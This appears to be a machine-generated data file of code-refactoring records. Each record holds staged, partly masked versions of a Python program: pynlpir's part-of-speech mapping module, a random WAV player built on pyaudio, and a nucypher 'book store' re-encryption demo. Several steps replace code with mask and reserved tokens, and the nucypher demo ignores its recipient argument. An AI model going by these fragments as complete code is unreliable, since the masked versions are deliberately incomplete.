'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (\n '表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',\n 'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':\n ('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',\n 'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),\n 'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (\n '问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',\n 'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),\n 'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),\n 'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',\n 'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (\n '略语', 'abbreviation')}\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Part of speech mapping constants and functions for NLPIR/ICTCLAS.\n\nThis module is used by :mod:`pynlpir` to format segmented words for output.\n\n\"\"\"\nimport logging\n\n\nlogger = logging.getLogger(\"pynlpir.pos_map\")\n\n#: A dictionary that maps part of speech codes returned by NLPIR to\n#: human-readable names (English and Chinese).\nPOS_MAP = {\n \"n\": (\n \"名词\",\n \"noun\",\n {\n \"nr\": (\n \"人名\",\n \"personal name\",\n {\n \"nr1\": (\"汉语姓氏\", \"Chinese surname\"),\n \"nr2\": (\"汉语名字\", \"Chinese given name\"),\n \"nrj\": (\"日语人名\", \"Japanese personal name\"),\n \"nrf\": (\"音译人名\", \"transcribed personal name\"),\n },\n ),\n \"ns\": (\n \"地名\",\n \"toponym\",\n {\n \"nsf\": (\"音译地名\", \"transcribed toponym\"),\n },\n ),\n \"nt\": (\"机构团体名\", \"organization/group name\"),\n \"nz\": (\"其它专名\", \"other proper noun\"),\n \"nl\": (\"名词性惯用语\", \"noun phrase\"),\n \"ng\": (\"名词性语素\", \"noun morpheme\"),\n },\n ),\n \"t\": (\n \"时间词\",\n \"time word\",\n {\n \"tg\": (\"时间词性语素\", \"time morpheme\"),\n },\n ),\n \"s\": (\"处所词\", \"locative word\"),\n \"f\": (\"方位词\", \"noun of locality\"),\n \"v\": (\n \"动词\",\n \"verb\",\n {\n \"vd\": (\"副动词\", \"auxiliary verb\"),\n \"vn\": (\"名动词\", \"noun-verb\"),\n \"vshi\": ('动词\"是\"', \"verb 是\"),\n \"vyou\": ('动词\"有\"', \"verb 有\"),\n \"vf\": (\"趋向动词\", \"directional verb\"),\n \"vx\": (\"行事动词\", \"performative verb\"),\n \"vi\": (\"不及物动词\", \"intransitive verb\"),\n \"vl\": (\"动词性惯用语\", \"verb phrase\"),\n \"vg\": (\"动词性语素\", \"verb morpheme\"),\n },\n ),\n \"a\": (\n \"形容词\",\n \"adjective\",\n {\n \"ad\": (\"副形词\", \"auxiliary adjective\"),\n \"an\": (\"名形词\", \"noun-adjective\"),\n \"ag\": (\"形容词性语素\", \"adjective morpheme\"),\n \"al\": (\"形容词性惯用语\", \"adjective phrase\"),\n },\n ),\n \"b\": (\n \"区别词\",\n \"distinguishing word\",\n {\n \"bl\": (\"区别词性惯用语\", \"distinguishing phrase\"),\n },\n ),\n \"z\": (\"状态词\", \"status word\"),\n \"r\": (\n \"代词\",\n \"pronoun\",\n {\n \"rr\": (\"人称代词\", \"personal pronoun\"),\n \"rz\": (\n \"指示代词\",\n \"demonstrative pronoun\",\n {\n \"rzt\": (\"时间指示代词\", \"temporal demonstrative pronoun\"),\n \"rzs\": (\"处所指示代词\", \"locative demonstrative pronoun\"),\n \"rzv\": (\"谓词性指示代词\", \"predicate demonstrative pronoun\"),\n },\n ),\n \"ry\": (\n \"疑问代词\",\n \"interrogative pronoun\",\n {\n \"ryt\": (\"时间疑问代词\", \"temporal interrogative pronoun\"),\n \"rys\": (\"处所疑问代词\", \"locative interrogative pronoun\"),\n \"ryv\": (\"谓词性疑问代词\", \"predicate interrogative pronoun\"),\n },\n ),\n \"rg\": (\"代词性语素\", \"pronoun morpheme\"),\n },\n ),\n \"m\": (\n \"数词\",\n \"numeral\",\n {\n \"mq\": (\"数量词\", \"numeral-plus-classifier compound\"),\n \"mg\": (\"干支\", \"zodiac\"),\n },\n ),\n \"q\": (\n \"量词\",\n \"classifier\",\n {\n \"qv\": (\"动量词\", \"verbal classifier\"),\n \"qt\": (\"时量词\", \"temporal classifier\"),\n },\n ),\n \"d\": (\"副词\", \"adverb\"),\n \"p\": (\n \"介词\",\n \"preposition\",\n {\n \"pba\": (\"介词“把”\", \"preposition 把\"),\n \"pbei\": (\"介词“被”\", \"preposition 被\"),\n },\n ),\n \"c\": (\n \"连词\",\n \"conjunction\",\n {\n \"cc\": (\"并列连词\", \"coordinating conjunction\"),\n },\n ),\n \"u\": (\n \"助词\",\n \"particle\",\n {\n \"uzhe\": (\"着\", \"particle 着\"),\n \"ule\": (\"了/喽\", \"particle 了/喽\"),\n \"uguo\": (\"过\", \"particle 过\"),\n \"ude1\": (\"的/底\", \"particle 的/底\"),\n \"ude2\": (\"地\", \"particle 地\"),\n \"ude3\": (\"得\", \"particle 得\"),\n \"usuo\": (\"所\", \"particle 所\"),\n \"udeng\": (\"等/等等/云云\", \"particle 等/等等/云云\"),\n \"uyy\": (\"一样/一般/似的/般\", \"particle 一样/一般/似的/般\"),\n \"udh\": (\"的话\", \"particle 的话\"),\n \"uls\": (\"来讲/来说/而言/说来\", \"particle 来讲/来说/而言/说来\"),\n \"uzhi\": (\"之\", \"particle 之\"),\n \"ulian\": (\"连\", \"particle 连\"),\n },\n ),\n \"e\": (\"叹词\", \"interjection\"),\n \"y\": (\"语气词\", \"modal particle\"),\n \"o\": (\"拟声词\", \"onomatopoeia\"),\n \"h\": (\"前缀\", \"prefix\"),\n \"k\": (\"后缀\", \"suffix\"),\n \"x\": (\n \"字符串\",\n \"string\",\n {\n \"xe\": (\"Email字符串\", \"email address\"),\n \"xs\": (\"微博会话分隔符\", \"hashtag\"),\n \"xm\": (\"表情符合\", \"emoticon\"),\n \"xu\": (\"网址URL\", \"URL\"),\n \"xx\": (\"非语素字\", \"non-morpheme character\"),\n },\n ),\n \"w\": (\n \"标点符号\",\n \"punctuation mark\",\n {\n \"wkz\": (\"左括号\", \"left parenthesis/bracket\"),\n \"wky\": (\"右括号\", \"right parenthesis/bracket\"),\n \"wyz\": (\"左引号\", \"left quotation mark\"),\n \"wyy\": (\"右引号\", \"right quotation mark\"),\n \"wj\": (\"句号\", \"period\"),\n \"ww\": (\"问号\", \"question mark\"),\n \"wt\": (\"叹号\", \"exclamation mark\"),\n \"wd\": (\"逗号\", \"comma\"),\n \"wf\": (\"分号\", \"semicolon\"),\n \"wn\": (\"顿号\", \"enumeration comma\"),\n \"wm\": (\"冒号\", \"colon\"),\n \"ws\": (\"省略号\", \"ellipsis\"),\n \"wp\": (\"破折号\", \"dash\"),\n \"wb\": (\"百分号千分号\", \"percent/per mille sign\"),\n \"wh\": (\"单位符号\", \"unit of measure sign\"),\n },\n ),\n \"g\": (\"复合语\", \"multiword expression\"),\n \"j\": (\"略语\", \"abbreviation\"),\n}\n\n\ndef _get_pos_name(pos_code, names=\"parent\", english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in (\"parent\", \"child\", \"all\", \"raw\"):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or \"\n \"'raw'; not '{0}'\".format(names)\n )\n logger.debug(\n \"Getting {0} POS name for '{1}' formatted as '{2}'.\".format(\n \"English\" if english else \"Chinese\", pos_code, names\n )\n )\n if names == \"raw\":\n return pos_code\n pos_code = pos_code.lower() # Issue #10\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".format(pos_code))\n return None # Issue #20\n pos = (pos_entry[1 if english else 0],)\n if names == \"parent\":\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to \"\n \"look for child name for '{1}'\".format(pos_entry[1], pos_code)\n )\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n\n if names == \"all\":\n # sub_pos can be None sometimes (e.g. for a word '甲')\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = (sub_pos,)\n\n name = pos if names == \"all\" else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name=\"parent\", english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def getNextFile(files):
return random.choice(files)
<|reserved_special_token_0|>
def getRandomFile(folder='test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(f.getsampwidth()),
channels=f.getnchannels(), rate=f.getframerate(), output=True)
data = f.readframes(CHUNK)
while data:
stream.write(data)
data = f.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def listFiles(path):
return glob.glob(path + '*.wav')
<|reserved_special_token_0|>
def getNextFile(files):
return random.choice(files)
<|reserved_special_token_0|>
def getRandomFile(folder='test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(f.getsampwidth()),
channels=f.getnchannels(), rate=f.getframerate(), output=True)
data = f.readframes(CHUNK)
while data:
stream.write(data)
data = f.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def listFiles(path):
return glob.glob(path + '*.wav')
<|reserved_special_token_0|>
def getNextFile(files):
return random.choice(files)
<|reserved_special_token_0|>
CHUNK = 1024
def getRandomFile(folder='test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(f.getsampwidth()),
channels=f.getnchannels(), rate=f.getframerate(), output=True)
data = f.readframes(CHUNK)
while data:
stream.write(data)
data = f.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
<|reserved_special_token_1|>
import glob
def listFiles(path):
return glob.glob(path + '*.wav')
import random
def getNextFile(files):
return random.choice(files)
import pyaudio
import wave
CHUNK = 1024
def getRandomFile(folder='test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(f.getsampwidth()),
channels=f.getnchannels(), rate=f.getframerate(), output=True)
data = f.readframes(CHUNK)
while data:
stream.write(data)
data = f.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
<|reserved_special_token_1|>
# list audio files
import glob
def listFiles(path):
return glob.glob(path + '*.wav')
import random
def getNextFile(files):
return random.choice(files)
import pyaudio
import wave
CHUNK = 1024
def getRandomFile(folder = 'test/'):
files = listFiles(folder)
filename = getNextFile(files)
return filename
def play(filename):
# opem file
f = wave.open(filename, 'rb')
p = pyaudio.PyAudio()
#open stream
stream = p.open(format = p.get_format_from_width(f.getsampwidth()),
channels = f.getnchannels(),
rate = f.getframerate(),
output = True)
# read data
data = f.readframes(CHUNK)
#play stream
while data:
stream.write(data)
data = f.readframes(CHUNK)
#stop stream
stream.stop_stream()
stream.close()
#close PyAudio
p.terminate()
|
flexible
|
{
"blob_id": "a3bcd383656284a2236e79b5d5d7acdfe433a13b",
"index": 8409,
"step-1": "<mask token>\n\n\ndef getNextFile(files):\n return random.choice(files)\n\n\n<mask token>\n\n\ndef getRandomFile(folder='test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\n\ndef play(filename):\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(), rate=f.getframerate(), output=True)\n data = f.readframes(CHUNK)\n while data:\n stream.write(data)\n data = f.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n",
"step-2": "<mask token>\n\n\ndef listFiles(path):\n return glob.glob(path + '*.wav')\n\n\n<mask token>\n\n\ndef getNextFile(files):\n return random.choice(files)\n\n\n<mask token>\n\n\ndef getRandomFile(folder='test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\n\ndef play(filename):\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(), rate=f.getframerate(), output=True)\n data = f.readframes(CHUNK)\n while data:\n stream.write(data)\n data = f.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n",
"step-3": "<mask token>\n\n\ndef listFiles(path):\n return glob.glob(path + '*.wav')\n\n\n<mask token>\n\n\ndef getNextFile(files):\n return random.choice(files)\n\n\n<mask token>\nCHUNK = 1024\n\n\ndef getRandomFile(folder='test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\n\ndef play(filename):\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(), rate=f.getframerate(), output=True)\n data = f.readframes(CHUNK)\n while data:\n stream.write(data)\n data = f.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n",
"step-4": "import glob\n\n\ndef listFiles(path):\n return glob.glob(path + '*.wav')\n\n\nimport random\n\n\ndef getNextFile(files):\n return random.choice(files)\n\n\nimport pyaudio\nimport wave\nCHUNK = 1024\n\n\ndef getRandomFile(folder='test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\n\ndef play(filename):\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(), rate=f.getframerate(), output=True)\n data = f.readframes(CHUNK)\n while data:\n stream.write(data)\n data = f.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n",
"step-5": "# list audio files\nimport glob\ndef listFiles(path):\n return glob.glob(path + '*.wav')\n\nimport random\ndef getNextFile(files):\n return random.choice(files)\n\nimport pyaudio\nimport wave\nCHUNK = 1024\n\ndef getRandomFile(folder = 'test/'):\n files = listFiles(folder)\n filename = getNextFile(files)\n return filename\n\ndef play(filename):\n # opem file\n f = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n #open stream \n stream = p.open(format = p.get_format_from_width(f.getsampwidth()), \n channels = f.getnchannels(), \n rate = f.getframerate(), \n output = True)\n # read data\n data = f.readframes(CHUNK)\n #play stream \n while data:\n stream.write(data) \n data = f.readframes(CHUNK)\n #stop stream \n stream.stop_stream() \n stream.close() \n #close PyAudio \n p.terminate()\n ",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from eth_account.account import Account
from nucypher.characters.lawful import Alice, Bob, Ursula
from nucypher.network.middleware import RestMiddleware
from nucypher.data_sources import DataSource
from umbral.keys import UmbralPublicKey
import sys
import os
import binascii
import shutil
import maya
import datetime
teacher_rest_port = 3501
m = 2
n = 3
with open("examples-runtime-cruft/node-metadata-{}".format(teacher_rest_port), "r") as f:
f.seek(0)
teacher_bytes = binascii.unhexlify(f.read())
URSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)
print("Will learn from {}".format(URSULA))
SHARED_CRUFTSPACE = "{}/examples-runtime-cruft".format(os.path.dirname(os.path.abspath(__file__)))
CRUFTSPACE = "{}/drm".format(SHARED_CRUFTSPACE)
CERTIFICATE_DIR = "{}/certs".format(CRUFTSPACE)
shutil.rmtree(CRUFTSPACE, ignore_errors=True)
os.mkdir(CRUFTSPACE)
os.mkdir(CERTIFICATE_DIR)
URSULA.save_certificate_to_disk(CERTIFICATE_DIR)
class ETHAccount(object):
def send_eth_to(self, to, amount):
return(to.fallback(self, amount))
class Author(object):
"""
The author of the book
"""
balance = 0
def __init__(self, eth_pk_bytes, character):
self.account = Account.create(eth_pk_bytes)
self.character = character
class Book(object):
def __init__(self, author):
self.author = author
self.content = b"PlainText of the book"
self.label = b"book"
class BookStoreEthContract(object):
"""
The contract receiving the rewards and selling the books
"""
def __init__(self, book, author, price, purchase_event_hook):
self.book = book
self.rewardee = author
self.price = price
self.purchase_event_hook = purchase_event_hook
def fallback(self, sender, amount):
print("Received %s ETH from %s" % (amount, sender.account.address))
if amount == self.price:
sender.balance -= amount
self.rewardee.balance += amount
return(self.purchase_event_hook(sender))
class BookStoreDelivery(object):
def __init__(self, book):
self.book = book
self.author = book.author
def deliver_purchase(self, to):
policy_end_datetime = maya.now() + datetime.timedelta(days=5)
policy = author.character.grant(first_buyer.character, self.book.label, m=m, n=n,
expiration=policy_end_datetime)
author_pubkey = bytes(self.author.character.stamp)
data_source = DataSource(policy_pubkey_enc=policy.public_key)
message_kit, _signature = data_source.encapsulate_single_message(self.book.content)
data_source_public_key = bytes(data_source.stamp)
return (author_pubkey, policy.public_key, data_source_public_key, self.book.label, message_kit)
class Buyer(ETHAccount):
"""
The person who pays for the book and receives content
"""
balance = 100
def __init__(self, eth_pk_bytes, character):
self.account = Account.create(eth_pk_bytes)
self.character = character
author = Author(b"Author's ETH account", Alice(network_middleware=RestMiddleware(),
known_nodes=(URSULA,),
federated_only=True,
known_certificates_dir=CERTIFICATE_DIR,))
author.character.start_learning_loop(now=True)
book = Book(author)
first_buyer = Buyer(b"First Buyer's ETH account", Bob(known_nodes=(URSULA,),
federated_only=True,
known_certificates_dir=CERTIFICATE_DIR))
book_store_delivery = BookStoreDelivery(book)
book_store_contract = BookStoreEthContract(book, author, 10, book_store_delivery.deliver_purchase)
author_public_key, policy_public_key, data_source_public_key, label, kit = first_buyer.send_eth_to(book_store_contract, 10)
first_buyer.character.join_policy(label, # The label - he needs to know what data he's after.
bytes(author.character.stamp), # To verify the signature, he'll need Alice's public key.
# He can also bootstrap himself onto the network more quickly
# by providing a list of known nodes at this time.
node_list=[("localhost", 3601)]
)
datasource_as_understood_by_bob = DataSource.from_public_keys(
policy_public_key=policy_public_key,
datasource_public_key=data_source_public_key,
label=label
)
alice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(author_public_key)
delivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,
data_source=datasource_as_understood_by_bob,
alice_verifying_key=alice_pubkey_restored_from_ancient_scroll)
print(delivered_cleartexts)
|
normal
|
{
"blob_id": "bc843abecfc076c9413498f9ebba0da0857ad3cc",
"index": 4103,
"step-1": "<mask token>\n\n\nclass Author(object):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\n",
"step-3": "<mask token>\nwith open('examples-runtime-cruft/node-metadata-{}'.format(\n teacher_rest_port), 'r') as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\n<mask token>\nprint('Will learn from {}'.format(URSULA))\n<mask token>\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\nauthor.character.start_learning_loop(now=True)\n<mask token>\nfirst_buyer.character.join_policy(label, bytes(author.character.stamp),\n node_list=[('localhost', 3601)])\n<mask token>\nprint(delivered_cleartexts)\n",
"step-4": "from eth_account.account import Account\nfrom nucypher.characters.lawful import Alice, Bob, Ursula\nfrom nucypher.network.middleware import RestMiddleware\nfrom nucypher.data_sources import DataSource\nfrom umbral.keys import UmbralPublicKey\nimport sys\nimport os\nimport binascii\nimport shutil\nimport maya\nimport datetime\nteacher_rest_port = 3501\nm = 2\nn = 3\nwith open('examples-runtime-cruft/node-metadata-{}'.format(\n teacher_rest_port), 'r') as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\nURSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)\nprint('Will learn from {}'.format(URSULA))\nSHARED_CRUFTSPACE = '{}/examples-runtime-cruft'.format(os.path.dirname(os.\n path.abspath(__file__)))\nCRUFTSPACE = '{}/drm'.format(SHARED_CRUFTSPACE)\nCERTIFICATE_DIR = '{}/certs'.format(CRUFTSPACE)\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, 